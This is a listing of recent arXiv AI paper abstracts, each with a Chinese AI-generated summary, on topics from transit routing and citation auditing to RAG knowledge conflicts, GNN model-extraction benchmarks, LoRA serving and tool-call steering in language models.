发表机构 * Department of Computer Science and Engineering, University of New South Wales (UNSW), Sydney, NSW 2033, Australia(新南威尔士大学计算机科学与工程系) Department of Data Science and Artificial Intelligence, Monash University, Melbourne, Australia(墨尔本大学数据科学与人工智能系)

AI总结 提出早期剪枝技术,通过预排序换乘连接并在换乘循环中应用剪枝规则,在不影响最优性的情况下加速公共交通路由算法,实验表明查询时间最多减少57%。

详情
AI中文摘要

公共交通的路由算法,特别是广泛使用的RAPTOR及其变体,在支持无限换乘时,常常在换乘松弛阶段面临性能瓶颈,尤其是在密集的换乘图上。这种低效源于遍历许多潜在的站点间连接(步行、自行车、电动滑板车等)。为了保持可接受的性能,从业者通常限制换乘距离或排除某些换乘选项,这可能会降低路径的最优性并限制向旅客展示的多模式选项。本文介绍了早期剪枝,一种低开销的技术,可以在不影响最优性的情况下加速路由算法。通过按持续时间预排序换乘连接,并在换乘循环内应用剪枝规则,该方法在站点处丢弃较长的换乘,一旦它们无法产生比当前最佳解更早的到达时间。早期剪枝可以以最小的更改集成到现有代码库中,并且只需要一次预处理步骤。该技术在扩展准则设置中保持帕累托最优性,只要额外的优化准则在换乘持续时间上单调非递减。在多个基于RAPTOR的最新解决方案中,包括RAPTOR、ULTRA-RAPTOR、McRAPTOR、BM-RAPTOR、ULTRA-McRAPTOR和UBM-RAPTOR,并在瑞士和伦敦交通网络上测试,我们实现了高达57%的查询时间减少。该方法为交通路径查找算法的效率提供了可推广的改进。

英文摘要

Routing algorithms for public transport, particularly the widely used RAPTOR and its variants, often face performance bottlenecks during the transfer relaxation phase, especially on dense transfer graphs, when supporting unlimited transfers. This inefficiency arises from iterating over many potential inter-stop connections (walks, bikes, e-scooters, etc.). To maintain acceptable performance, practitioners often limit transfer distances or exclude certain transfer options, which can reduce path optimality and restrict the multimodal options presented to travellers. This paper introduces Early Pruning, a low-overhead technique that accelerates routing algorithms without compromising optimality. By pre-sorting transfer connections by duration and applying a pruning rule within the transfer loop, the method discards longer transfers at a stop once they cannot yield an earlier arrival than the current best solution. Early Pruning can be integrated with minimal changes to existing codebases and requires only a one-time preprocessing step. The technique preserves Pareto-optimality in extended-criteria settings whenever the additional optimization criteria are monotonically non-decreasing in transfer duration. Across multiple state-of-the-art RAPTOR-based solutions, including RAPTOR, ULTRA-RAPTOR, McRAPTOR, BM-RAPTOR, ULTRA-McRAPTOR, and UBM-RAPTOR and tested on the Switzerland and London transit networks, we achieved query time reductions of up to 57\%. This approach provides a generalizable improvement to the efficiency of transit pathfinding algorithms.

2605.16000 2026-05-27 cs.SI cs.AI cs.DL 版本更新

CitePrism: Human-in-the-Loop AI for Citation Auditing and Editorial Integrity

CitePrism:面向引文审计与编辑完整性的人机协同AI

Gowrika Mahesh, Budanur Madappa Darshan Gowda, Kavana Gopladevarahalli Papegowda, Prajwal Basavaraj, Binh Vu, Swati Chandna, Mehrdad Jalali

发表机构 * GitHub

AI总结 提出CitePrism框架,结合LLM推理、嵌入相似度、元数据验证和人工审核,实现稿件级引文审计,初步验证显示可辅助编辑筛选不相关引文。

Comments 30 pages, 5 main figures, 3 tables, appendices with interface screenshots and implementation details; pilot-stage framework and single-manuscript validation study

详情
AI中文摘要

编辑和审稿人应确保稿件引用相关、准确、最新且符合伦理的文献,但稿件级引文审计目前仍主要依赖人工、分散且难以规模化。引文上下文、元数据质量、自引模式和书目完整性都会影响参考文献是否恰当支持局部主张。我们提出CitePrism,一个透明的混合决策支持框架,用于编辑引文审计,它结合了LLM辅助的上下文推理、基于嵌入的语义相似性、元数据验证、完整性标志和人机协同的分析师审查。CitePrism提取引文邻域、丰富参考文献元数据、计算融合相关性分数、呈现元数据和自引审查提示,并支持可配置的阈值分类。在针对一篇包含104条参考文献的路面工程案例稿件的初步验证中,与人工二元相关性标签的一致性达到Cohen's kappa = 0.429。在操作阈值tau=17时,CitePrism标记了所有人工标记为不相关的引文,同时也产生了需要分析师审查的误报。这些结果表明CitePrism可能支持保守的编辑筛选和引文质量分类,但并未确立通用的编辑性能。CitePrism旨在作为试点阶段的决策支持,而非自主的不端行为检测器或自动化编辑决策系统。在操作使用前,需要在稿件、领域、标注者、基线和部署设置中进行更广泛的验证。

英文摘要

Editors and reviewers are expected to ensure that manuscripts cite relevant, accurate, current, and ethically appropriate literature, yet manuscript-level citation auditing remains largely manual, fragmented, and difficult to scale. Citation context, metadata quality, self-citation patterns, and bibliographic integrity all affect whether a reference appropriately supports a local claim. We present CitePrism, a transparent hybrid decision-support framework for editorial citation auditing that combines LLM-assisted contextual reasoning, embedding-based semantic similarity, metadata verification, integrity-oriented flags, and human-in-the-loop analyst review. CitePrism extracts citation neighborhoods, enriches reference metadata, computes fused relevance scores, surfaces metadata and self-citation review prompts, and supports configurable threshold-based triage. In a preliminary validation on a single case-study manuscript with 104 references from pavement engineering, agreement with human binary relevance labels reached Cohen's kappa = 0.429. At operating threshold tau = 17, CitePrism flagged all human-labeled irrelevant citations, while also producing false positives requiring analyst review. These results suggest that CitePrism may support conservative editorial screening and citation-quality triage, but they do not establish general editorial performance. CitePrism is intended as pilot-stage decision support, not as an autonomous misconduct detector or automated editorial decision system. Broader validation across manuscripts, domains, annotators, baselines, and deployment settings is required before operational use.

2605.15850 2026-05-27 cs.CY cs.AI cs.HC 版本更新

Access Timing as Scaffolding: A Reinforcement Learning Approach to GenAI in Education

访问时机作为脚手架:一种强化学习方法在生成式AI教育中的应用

Janne Rotter, Pau Benazet i Montobbio, Davinia Hernández-Leo

发表机构 * Universitat Pompeu Fabra(庞培法华大学)

AI总结 本研究通过强化学习智能体控制生成式AI的访问时机,基于元认知理论、认知负荷理论和生产性失败设计奖励函数,实验证明策略性定时访问相比无限制和完全限制使用能提高学习效果和元认知准确性。

详情
AI中文摘要

近年来,生成式AI(GenAI)在教育环境中的应用已成为大学生日常生活中的普遍现象,尽管它有可能在不受限制地使用时导致过度依赖、元认知脱离和学习效果下降。虽然大多数先前研究关注如何从教学法上脚手架其使用,但何时允许使用现成的GenAI这一问题仍未被充分研究,且缺乏基于教学法的实证调查。我们将访问时机本身视为一种隐式脚手架,并通过强化学习(RL)智能体来操作化它,该智能体决定学生何时应访问GenAI,其奖励函数基于元认知理论、认知负荷理论和生产性失败。在一项包含105名高等教育学生的混合方法对照实验室研究中,我们比较了该智能体对学习收益和元认知参与的影响,与无限制和完全限制使用的情况进行对比。结果表明,在强化学习条件下,策略性定时的GenAI访问相比无限制访问改善了客观后测表现和元认知准确性,同时相比完全限制减少了任务错误和任务时间,从而在没有显式元认知提示或结构化脚手架的情况下优于这两种方法。然而,在自我报告的元认知意识方面没有出现条件间的差异。因此,GenAI访问的时机是一种可处理、有理论基础且可扩展的教学策略,优于完全无限制和完全限制的访问,与现成工具兼容且可能具有较低的采用障碍。这开辟了一个新的研究领域,探索教育者如何促进访问时机以及在人类-AI学习系统设计中实现它。

英文摘要

In recent years, generative AI (GenAI) in educational settings has become ubiquitous in university students' daily lives, despite its potential to induce over-reliance, metacognitive disengagement, and diminished learning when used unrestrictedly. While most prior research has focused on how to pedagogically scaffold its usage, the question of when to allow off-the-shelf GenAI remains understudied and lacks pedagogically grounded empirical investigation. We treat access timing itself as a form of implicit scaffolding and operationalize it through a reinforcement learning (RL) agent that decides when students should access GenAI, with a reward function grounded in metacognitive theory, cognitive load theory, and productive failure. In a mixed-methods controlled lab study with N=105 higher education students, we compared the agent's effect on learning gains and metacognitive engagement to unrestricted and fully restricted use. Results show that strategically timed GenAI access under the reinforcement learning condition improved objective post-test performance and metacognitive accuracy compared with unrestricted access, while reducing task errors and time on task relative to complete withholding, thus outperforming both approaches without the need for explicit metacognitive prompts or structured scaffolding. However, no between-condition differences emerged on self-reported metacognitive awareness. Overall, timing of GenAI access therefore is a tractable, theoretically grounded, and scalable pedagogical strategy that improves over completely unrestricted and withheld access, compatible with off-the-shelf tools and potentially low adoption barrier. This opens up a new research area that explores how access timing can be facilitated by educators and implemented in human-AI learning system design.

2605.14473 2026-05-27 cs.CL cs.AI 版本更新

Does RAG Know When Retrieval Is Wrong? Diagnosing Context Compliance under Knowledge Conflict

RAG 能知道检索错误吗?知识冲突下的上下文合规性诊断

Yihang Chen, Pin Qian, Su Wang, Sipeng Zhang, Huan Xu, Shuhuai Lin, Xinpeng Wei

发表机构 * Georgia Institute of Technology(佐治亚理工学院) Carnegie Mellon University(卡内基梅隆大学) University of California San Diego(加州大学圣地亚哥分校)

AI总结 提出上下文驱动分解(CDD)方法,在推理时探测并干预检索增强生成中的上下文与参数知识冲突,揭示上下文合规性模式并提升鲁棒性。

Comments 12 pages, 4 figures, 3 tables

详情
AI中文摘要

检索增强生成(RAG)中的上下文合规机制发生在检索到的上下文主导最终答案时,即使它与模型的参数化知识冲突。仅凭准确性并不能揭示在这种冲突下检索到的上下文如何因果性地塑造答案。我们引入了上下文驱动分解(CDD),这是一种在推理时运行的信念分解探针,并作为受控检索冲突的干预机制。通过跨Epi-Scale压力测试、TruthfulQA错误概念注入和跨模型重复实验,CDD揭示了三种模式。P1:上下文合规性在对抗性上界设置中是可测量的,标准RAG在TruthfulQA错误概念注入(N=500)上达到15.0%的准确率。P2:对抗性准确率提升跨模型家族迁移——CDD提高了Gemini-2.5-Flash以及Claude Haiku/Sonnet/Opus的准确率——但理由-答案因果耦合不迁移。CDD在Gemini-2.5-Flash上达到64.1%的错误注入因果敏感性,而所有三种Claude变体的敏感性落在[-3%, +7%]范围内,表明Claude侧的准确率提升通过一种与显式冲突解决轨迹不同的机制运作。P3:显式冲突分解提高了时间漂移和噪声干扰下的鲁棒性,CDD在完整Epi-Scale对抗性基准上对时间偏移达到71.3%,对干扰证据达到69.9%。这三种模式将上下文合规性识别为一个结构轴,沿此轴可以对标准RAG进行探测和干预,区别于检索质量或单一方法鲁棒性问题,并激励发布Epi-Scale以跨模型家族和检索管道进行系统研究。

英文摘要

The Context-Compliance Regime in Retrieval-Augmented Generation (RAG) occurs when retrieved context dominates the final answer even when it conflicts with the model's parametric knowledge. Accuracy alone does not reveal how retrieved context causally shapes answers under such conflict. We introduce Context-Driven Decomposition (CDD), a belief-decomposition probe that operates at inference time and serves as an intervention mechanism for controlled retrieval conflict. Across Epi-Scale stress tests, TruthfulQA misconception injection, and cross-model reruns, CDD exposes three patterns. P1: context compliance is measurable in an upper-bound adversarial setting, where Standard RAG reaches 15.0% accuracy on TruthfulQA misconception injection (N=500). P2: adversarial accuracy gains transfer across model families -- CDD improves accuracy on Gemini-2.5-Flash and on Claude Haiku/Sonnet/Opus -- but rationale-answer causal coupling does not transfer. CDD reaches 64.1% mistake-injection causal sensitivity on Gemini-2.5-Flash, while sensitivities for all three Claude variants fall in the [-3%, +7%] range, suggesting that the Claude-side accuracy gains operate through a mechanism distinct from the explicit conflict-resolution trace. P3: explicit conflict decomposition improves robustness under temporal drift and noisy distractors, with CDD reaching 71.3% on temporal shifts and 69.9% on distractor evidence on the full Epi-Scale adversarial benchmark. These three patterns identify context-compliance as a structural axis along which standard RAG can be probed and intervened on, distinct from retrieval-quality or single-method robustness questions, and motivate releasing Epi-Scale for systematic study across model families and retrieval pipelines.

2605.11651 2026-05-27 cs.CV cs.AI cs.CL 版本更新

Hide to See: Reasoning-prefix Masking for Visual-anchored Thinking in VLM Distillation

Hide to See: 面向VLM蒸馏中视觉锚定思维的推理前缀掩码

Seonghoon Yu, Dongjun Nam, Byung-Kwan Lee, Jeany Son

发表机构 * KAIST(韩国科学技术院) NVIDIA(英伟达) POSTECH(POSTECH大学)

AI总结 提出一种推理前缀掩码蒸馏框架,通过掩码学生模型的显著推理前缀,迫使其在推理过程中更依赖视觉证据,从而缓解长推理轨迹中的视觉遗忘问题,提升多模态推理性能。

Comments Pre-print

详情
AI中文摘要

近期VLM中的思考-回答方法(如Qwen3-VL-Thinking)通过在最终答案前利用中间推理步骤来提升推理性能,但其计算成本显著增加,尤其是对于较大的VLM。为了将这种能力蒸馏到紧凑的思考-回答VLM中,一个主要目标是提高学生在整个推理轨迹中利用视觉证据的能力,因为长思考-回答轨迹存在视觉遗忘问题。为此,我们引入了一种新颖的思考-回答蒸馏框架,通过掩码学生模型的显著推理前缀,鼓励学生将思考锚定在视觉信息上。为了补偿这种被掩码的文本线索,学生在蒸馏过程中被鼓励更多地依赖视觉证据作为替代信息源。我们的掩码策略包括:1)逐token的显著推理前缀掩码,针对每个下一token预测选择性掩码高影响力的推理前缀;2)自调节掩码预算调度,根据教师-学生分布之间的差异(即蒸馏难度)逐渐增加掩码规模。在蒸馏阶段,学生模型由我们的显著推理前缀掩码引导,该掩码同时阻塞未来token和显著推理线索,替代了自回归语言建模中使用的标准因果掩码。实验结果表明,我们的方法在多模态推理基准上优于最近的开源VLM、VLM蒸馏和自蒸馏方法,进一步分析证实了学生思考过程中视觉利用的增强。

英文摘要

Recent think-answer approaches in VLMs, such as Qwen3-VL-Thinking, boost reasoning performance by leveraging intermediate thinking steps before the final answer, but their computational cost becomes substantial, especially for larger VLMs. To distill such capabilities into compact think-answer VLMs, a primary objective is to improve the student's ability to utilize visual evidence throughout its reasoning trace, as long think-answer traces suffer from visual forgetting issues. To this end, we introduce a novel think-answer distillation framework that encourages the student to anchor its thinking on visual information by masking the student's salient reasoning prefixes. To compensate for such masked textual cues, the student is encouraged to rely more on visual evidence as an alternative source of information during distillation. Our masking strategies include: 1) token-wise salient reasoning-prefix masking, which masks high-influence reasoning prefixes selectively for each next-token prediction, and 2) self-paced masking budget scheduling, which gradually increases the masking scale according to distillation difficulty, measured by the discrepancy between teacher--student distributions. In the distillation phase, the student is guided by our salient reasoning-prefix mask, which blocks both future tokens and salient reasoning cues, in place of the standard causal mask used for auto-regressive language modeling. Experimental results show that our approach outperforms recent open-source VLMs, VLM distillation, and self-distillation methods on multimodal reasoning benchmarks, while further analyzes confirm enhanced visual utilization along the student thinking process.

2605.13779 2026-05-27 cs.LG cs.AI cs.DC 版本更新

MinT: Managed Infrastructure for Training and Serving Millions of LLMs

MinT:用于训练和服务数百万LLM的托管基础设施

Mind Lab, :, Song Cao, Vic Cao, Andrew Chen, Kaijie Chen, Cleon Cheng, Steven Chiang, Kaixuan Fan, Hera Feng, Huan Feng, Arthur Fu, Jun Gao, Hongquan Gu, Aaron Guan, Nolan Ho, Mutian Hong, Hailee Hou, Peixuan Hua, Charles Huang, Miles Jiang, Nora Jiang, Yuyi Jiang, Qiuyu Jin, Fancy Kong, Andrew Lei, Kyrie Lei, Alexy Li, Lucian Li, Ray Li, Theo Li, Zhihui Li, Jiayi Lin, Kairus Liu, Kieran Liu, Logan Liu, Xiang Liu, Irvine Lu, Maeve Luo, Runze Lv, Pony Ma, Verity Niu, Anson Qiu, Vincent Wang, Rio Yang, Maxwell Yao, Carrie Ye, Regis Ye, Wenlin Ye, Josh Ying, Danney Zeng, Yuhan Zhan, Anya Zhang, Di Zhang, Ruijia Zhang, Sueky Zhang, Ya Zhang, Wei Zhao, Ada Zhou, Changhai Zhou, Yuhua Zhou, Xinyue Zhu, Murphy Zhuang

发表机构 * Mind Lab

AI总结 提出MinT系统,通过LoRA适配器管理实现大规模基础模型上的高效训练与在线服务,支持百万级策略目录。

Comments 30 pages, technical report

详情
AI中文摘要

我们提出MindLab Toolkit (MinT),一个用于低秩适配(LoRA)后训练和在线服务的托管基础设施系统。MinT针对这样一种场景:在少量昂贵的基模型部署上产生许多训练好的策略。MinT不是将每个策略实现为合并的完整检查点,而是保持基模型驻留,并通过回滚、更新、导出、评估、服务和回滚等阶段移动导出的LoRA适配器修订版,将分布式训练、服务、调度和数据移动隐藏在服务接口后面。MinT沿三个维度扩展此路径。Scale Up将LoRA RL扩展到前沿规模的密集和MoE架构,包括MLA和DSA注意力路径,训练和服务已验证超过1T总参数。Scale Down仅移动导出的LoRA适配器,在秩1设置中可小于基模型大小的1%;适配器仅移交将测量步骤在4B密集模型上减少18.3倍,在30B MoE上减少2.85倍,而并发多策略GRPO将挂钟时间缩短1.77倍和1.45倍,且不提高峰值内存。Scale Out将持久策略可寻址性与CPU/GPU工作集分离:张量并行部署支持10^6规模的可寻址目录(通过100K测量单引擎扫描)和集群规模的千适配器活动波,冷加载作为计划的服务工作处理,打包的MoE LoRA张量将实时引擎加载提高8.5-8.7倍。因此,MinT管理百万规模的LoRA策略目录,同时在共享的1T级基模型上训练和服务选定的适配器修订版。

英文摘要

We present MindLab Toolkit (MinT), a managed infrastructure system for Low-Rank Adaptation (LoRA) post-training and online serving. MinT targets a setting where many trained policies are produced over a small number of expensive base-model deployments. Instead of materializing each policy as a merged full checkpoint, MinT keeps the base model resident and moves exported LoRA adapter revisions through rollout, update, export, evaluation, serving, and rollback, hiding distributed training, serving, scheduling, and data movement behind a service interface. MinT scales this path along three axes. Scale Up extends LoRA RL to frontier-scale dense and MoE architectures, including MLA and DSA attention paths, with training and serving validated beyond 1T total parameters. Scale Down moves only the exported LoRA adapter, which can be under 1% of base-model size in rank-1 settings; adapter-only handoff reduces the measured step by 18.3x on a 4B dense model and 2.85x on a 30B MoE, while concurrent multi-policy GRPO shortens wall time by 1.77x and 1.45x without raising peak memory. Scale Out separates durable policy addressability from CPU/GPU working sets: a tensor-parallel deployment supports 10^6-scale addressable catalogs (measured single-engine sweeps through 100K) and thousand-adapter active waves at cluster scale, with cold loading treated as scheduled service work and packed MoE LoRA tensors improving live engine loading by 8.5-8.7x. MinT thus manages million-scale LoRA policy catalogs while training and serving selected adapter revisions over shared 1T-class base models.

2605.12827 2026-05-27 cs.CR cs.AI cs.LG 版本更新

GraphIP-Bench: How Hard Is It to Steal a Graph Neural Network, and Can We Stop It?

GraphIP-Bench:窃取图神经网络有多难,我们能阻止吗?

Kaixiang Zhao, Bolin Shen, Yuyang Dai, Shayok Chakraborty, Yushun Dong

发表机构 * University of Notre Dame(诺特大学) Florida State University(佛罗里达州立大学) University of California, Berkeley(加州大学伯克利分校)

AI总结 提出统一基准GraphIP-Bench,集成12种提取攻击和12种防御,评估图神经网络模型窃取的难易程度及防御有效性,发现中等查询预算下窃取容易且多数防御无效,异配图更难窃取。

Comments Under review

详情
AI中文摘要

作为云服务部署的图神经网络(GNN)可能通过模型提取攻击被窃取,这种攻击从查询响应中训练替代模型以复制目标行为,而越来越多的所有权防御试图防止或追踪此类窃取。本文提出两个问题:窃取GNN有多难,我们能阻止吗?先前的工作无法回答这两个问题,因为实验使用了不一致的数据集、威胁模型和指标。我们引入GraphIP-Bench,一个统一的基准,在单一黑盒协议下评估双方。GraphIP-Bench集成了十二种提取攻击、十二种防御(涵盖水印、输出扰动和查询模式检测)、十个公共图(涵盖同质、异质和大规模场景)、三种GNN骨干网络和三种图学习任务。它报告了在共享划分、查询和预算下的保真度、任务效用、所有权验证和计算成本。我们进一步增加了一个联合攻击与防御赛道,对每个受防御目标运行每种攻击,并测量结果替代模型上的水印验证,揭示了防御在提取后保留了多少保护。实证结果清晰:在中等查询预算下窃取GNN很容易,大多数防御并未改变这一点;几种水印在受保护模型上可靠验证,但在提取的替代模型上失去了大部分验证信号,暴露了单模型评估忽略的差距;异配图系统性地更难窃取,而目标与替代模型之间的跨架构不匹配减少了但并未阻止提取。我们发布了GraphIP-Bench,附带可复现的脚本和配置,并将攻击和防御集成到PyGIP库中。代码:https://github.com/LabRAI/GraphIP-Bench。库:https://labrai.github.io/PyGIP/index.html。

英文摘要

Graph neural networks (GNNs) deployed as cloud services can be stolen through model-extraction attacks, which train a surrogate from query responses to reproduce the target's behavior, and a growing line of ownership defenses tries to prevent or trace such theft. This paper asks two questions: how hard is it to steal a GNN, and can we stop it? Prior work cannot answer either, because experiments use inconsistent datasets, threat models, and metrics. We introduce GraphIP-Bench, a unified benchmark that evaluates both sides under a single black-box protocol. GraphIP-Bench integrates twelve extraction attacks, twelve defenses spanning watermarking, output perturbation, and query-pattern detection, ten public graphs covering homophilic, heterophilic, and large-scale regimes, three GNN backbones, and three graph-learning tasks. It reports fidelity, task utility, ownership verification, and computational cost on shared splits, queries, and budgets. We further add a joint attack-and-defense track that runs every attack on every defended target and measures watermark verification on the resulting surrogate, exposing how much protection a defense retains after extraction. The empirical picture is clear: stealing a GNN is easy at medium query budgets and most defenses do not change this; several watermarks verify reliably on the protected model but lose most of their verification signal on the extracted surrogate, exposing a gap that single-model evaluations miss; and heterophilic graphs are systematically harder to steal, while a cross-architecture mismatch between target and surrogate reduces but does not prevent extraction. We release GraphIP-Bench with reproducible scripts and configurations, and integrate the attacks and defenses into the PyGIP library. Code: https://github.com/LabRAI/GraphIP-Bench. Library: https://labrai.github.io/PyGIP/index.html.

2511.02230 2026-05-27 cs.OS cs.AI cs.NI 版本更新

Continuum: Efficient and Robust Multi-Turn LLM Agent Scheduling with KV Cache Time-to-Live

Continuum: 基于KV缓存生存时间的高效鲁棒多轮LLM智能体调度

Hanchen Li, Runyuan He, Qiuyang Mang, Qizheng Zhang, Huanzhi Mao, Xiaokun Chen, Hangrui Zhou, Alvin Cheung, Joseph Gonzalez, Ion Stoica

发表机构 * UC Berkeley(加州大学伯克利分校) Stanford University(斯坦福大学) Tensormesh(Tensormesh公司) Tsinghua University(清华大学)

AI总结 针对多轮智能体工作负载中工具调用导致KV缓存无法跨轮重用的问题,提出Continuum系统,通过引入KV缓存的生存时间(TTL)机制,在GPU内存中选择性固定缓存,权衡重算/重载成本与排队延迟,实现作业完成时间平均提升8倍以上。

详情
AI中文摘要

KV缓存管理对于高效的LLM推理至关重要。为了最大化利用率,现有推理引擎会在新请求等待时驱逐已完成请求的KV缓存。但这种策略对于智能体工作负载不适用,因为智能体工作负载将LLM调用与工具调用交错进行,引入了停顿,从而阻止了跨轮次的KV有效重用。由于许多工具调用的持续时间远短于人类响应的多轮聊天,因此在工具调用期间保留KV缓存是有前景的。然而,仍存在许多挑战。首先,我们需要考虑重算或重载(如果启用卸载)的潜在成本,以及从GPU驱逐后增加的排队延迟。其次,由于工具调用持续时间的内部方差,该方法需要在工具调用持续时间有限可预测性下保持鲁棒性。我们提出了Continuum,一个通过引入KV缓存保留的生存时间(TTL)机制来优化多轮智能体工作负载作业完成时间的服务系统。对于生成工具调用的请求,Continuum选择性地将KV缓存固定在GPU内存中,其TTL值由重载成本和驱逐引起的潜在排队延迟决定。当TTL过期时,KV缓存可自动被驱逐以释放GPU内存,从而在边缘情况下提供鲁棒性能。当与程序级先来先服务结合时,Continuum保持了多轮连续性,并减少了智能体工作流的延迟。在真实世界智能体(SWE-Bench、BFCL、OpenHand)上使用Llama-3.1 8B/70B、Gemma-3 12B和GLM-4.5 355B的评估表明,Continuum在提高吞吐量的同时,将平均作业完成时间提升了8倍以上。

英文摘要

KV cache management is essential for efficient LLM inference. To maximize utilization, existing inference engines evict finished requests' KV cache if new requests are waiting. This policy breaks for agentic workloads, which interleave LLM calls with tools, introducing pauses that prevent effective KV reuse across turns. Since many tool calls have much shorter durations than human response multi-turn chatbot, it would be promising to retain the KV cache in during these tools. However, many challenges remain. First, we need to consider both the potential cost of recomputation or reloading (if offloading enabled) as well as the increasing queueing delays after eviction from GPU. Second, due to the internal variance of tool call durations, the method needs to remain robust under limited predictability of tool call durations. We present Continuum, a serving system to optimize job completion time for multi-turn agent workloads by introducing time-to-live mechanism for KV cache retention. For requests that generate tool calls, Continuum selectively pins the KV cache in GPU memory with a time-to-live value determined by the reload cost and potential queueing delay induced by eviction. When the TTL expires, the KV cache can be automatically evicted to free up GPU memory, providing robust performance under edge cases. When combined with program-level first-come-first-serve, Continuum preserves multi-turn continuity, and reduces delay for agentic workflows. Evaluations on real-world agents (SWE-Bench, BFCL, OpenHand) with Llama-3.1 8B/70B, Gemma-3 12B, and GLM-4.5 355B shows that Continuum improves the average job completion times by over 8x while improving throughput.

2605.09156 2026-05-27 cs.CL cs.AI 版本更新

Lost in Translation? Exploring the Shift in Grammatical Gender from Latin to Occitan

迷失在翻译中?探索从拉丁语到奥克语的语法性别转变

Ahan Chatterjee, Matthias Schöffel, Matthias Aßenmacher, Marinus Wiedner, Esteban Garces Arias

发表机构 * Bavarian Academy of Sciences (BAdW)(巴伐利亚科学学院) LMU Munich(慕尼黑大学) Munich Center for Machine Learning (MCML)(慕尼黑机器学习中心) University of Freiburg(弗赖堡大学)

AI总结 本文提出一个可解释的深度学习框架,通过词法和上下文层面分析拉丁语到奥克语的语法性别系统从三分(阳性、阴性、中性)到二分(阳性、阴性)的演变,并展示了改进的分词策略和形态特征、词性对性别预测的贡献。

Comments Accepted at NLP4DH @ ACL 2026

详情
AI中文摘要

从拉丁语到罗曼语族的历时演变涉及语法性别系统的重组,在大多数罗曼语中从三分结构(阳性、阴性、中性)变为二分结构(阳性、阴性)。在这项工作中,我们引入了一个可解释的深度学习框架,在词法和上下文层面研究这一现象。首先,我们表明传统的分词策略对于这种低资源历史设置不够稳健,而我们提出的分词器在这些基线上提高了性能。在词法层面,我们评估了形态特征对性别预测的贡献。在上下文层面,我们量化了不同词性类别对语法性别预测的贡献。这些分析共同刻画了性别信息在词元及其句子上下文之间的分布。我们在 \href{https://github.com/ahan-2000/Lost-in-Translation-}{https://github.com/ahan-2000/Lost-in-Translation-} 公开了我们的代码库、数据集和结果。

英文摘要

The diachronic evolution from Latin to the Romance languages involved a restructuring of the grammatical gender system from a tripartite configuration (masculine, feminine, neuter) to a bipartite one (masculine, feminine) in most Romance languages. In this work, we introduce an interpretable deep learning framework to investigate this phenomenon at both lexical and contextual levels. First, we show that conventional tokenization strategies are insufficiently robust for this low-resource historical setting, and that our proposed tokenizer improves performance over these baselines. At the lexical level, we evaluate the contribution of morphological features to gender prediction. At the contextual level, we quantify the contributions of different part-of-speech categories to grammatical gender prediction. Together, these analyses characterize the distribution of gender information between the lemma and its sentential context. We make our codebase, datasets, and results publicly available at \href{https://github.com/ahan-2000/Lost-in-Translation-}{https://github.com/ahan-2000/Lost-in-Translation-}.

2605.03929 2026-05-27 cs.SD cs.AI cs.LG eess.SP 版本更新

PHALAR: Phasors for Learned Musical Audio Representations

PHALAR:用于学习音乐音频表示的相量

Davide Marincione, Michele Mancusi, Giorgio Strano, Luca Cerovaz, Donato Crisostomi, Roberto Ribuoli, Emanuele Rodolà

发表机构 * Department of Computer Science, Sapienza University of Rome, Italy(罗马大学计算机科学系) Moises Systems, Inc.(Moises系统公司) Paradigma, Inc.(Paradigma公司)

AI总结 提出PHALAR对比框架,利用学习谱池化和复值头实现音高和相位等变,在茎检索任务中参数减少50%、训练加速7倍,准确率相对提升约70%,并捕获鲁棒的音乐结构。

Comments Accepted at ICML 2026

详情
AI中文摘要

茎检索,即匹配缺失茎到给定音频子混音的任务,是一个关键挑战,目前受限于丢弃时间信息的模型。我们引入PHALAR,一个对比框架,在参数少于50%且训练加速7倍的情况下,相对于现有技术实现了高达约70%的相对准确率提升。通过利用学习谱池化层和复值头,PHALAR强制施加音高等变和相位等变偏差。PHALAR在MoisesDB、Slakh和ChocoChorales上建立了新的检索最优结果,与人类一致性判断的相关性显著高于语义基线。最后,零样本节拍跟踪和线性和弦探测证实PHALAR捕获了超越检索任务的鲁棒音乐结构。

英文摘要

Stem retrieval, the task of matching missing stems to a given audio submix, is a key challenge currently limited by models that discard temporal information. We introduce PHALAR, a contrastive framework achieving a relative accuracy increase of up to $\approx 70\%$ over the state-of-the-art while requiring $<50\%$ of the parameters and a 7$\times$ training speedup. By utilizing a Learned Spectral Pooling layer and a complex-valued head, PHALAR enforces pitch-equivariant and phase-equivariant biases. PHALAR establishes new retrieval state-of-the-art across MoisesDB, Slakh, and ChocoChorales, correlating significantly higher with human coherence judgment than semantic baselines. Finally, zero-shot beat tracking and linear chord probing confirm that PHALAR captures robust musical structures beyond the retrieval task.

2605.07990 2026-05-27 cs.CL cs.AI cs.LG cs.SE 版本更新

Tool Calling is Linearly Readable and Steerable in Language Models

语言模型中的工具调用是线性可读且可引导的

Zekun Wu, Ze Wang, Seonglae Cho, Yufei Yang, Adriano Koshiyama, Sahan Bulathwela, Maria Perez-Ortiz

发表机构 * University College London(伦敦大学学院) Holistic AI Imperial College London(伦敦帝国学院)

AI总结 本文发现语言模型内部存在对应工具选择的线性方向,通过干预该方向可切换工具调用,并能提前检测潜在错误,在多个模型和基准上验证了有效性。

Comments 24 pages. ACL ARR May 2026 submission (EMNLP 2026 preferred venue); v2 reflects revised manuscript

详情
AI中文摘要

当工具调用代理选错工具时,失败在执行之前是不可见的:邮件被发送,会议被错过。随着代理承担重要行动,一次糟糕的工具调用可能造成实际损害。目前我们无法在模型内部查看并在错误发生前捕捉它;本文表明我们可以做到。在模型内部,工具的选择由激活空间中的单个方向承载,每对工具对应一个方向。在生成过程中添加该方向会切换模型选择的工具。在涵盖 Gemma 3、Qwen 3、Qwen 2.5 和 Llama 3.1(270M 到 27B)的 12 个指令微调模型和 6 个基础模型上,这在 4B+ 指令微调模型上对 15 个工具的合成基准达到 83-100% 的准确率,在真实 API 基准 τ-bench airline 上达到 77-94%。随后的 JSON 参数自动适应新工具的模式,因此仅翻转名称就足够了。相同的每工具方向还能在错误发生前标记潜在错误:模型在两个工具之间不确定的查询失败率比确定的高 21 倍(Gemma 3 27B)。这不仅仅是主题注入:相同幅度的随机向量给出 0% 的切换率,而在单个领域(共享一个主题的 14 个航空工具)内的探针仍然能在五个 4B-14B 模型上以 top-1 61-89% 的准确率读取模型将调用的工具。即使是基础模型在能够输出工具之前内部已经携带了正确的工具:从模型内部状态读取所选工具(余弦读出)在 BFCL 上恢复 61-82% 的准确率,而基础生成仅为 2-10%,这表明预训练形成了表示,而指令微调后来将其连接到输出。我们的结果涵盖单轮、固定菜单设置;在多轮代理循环中,相同的干预不太稳定(匹配基线的增益或损失高达 30 个百分点,没有一致的方向)。

英文摘要

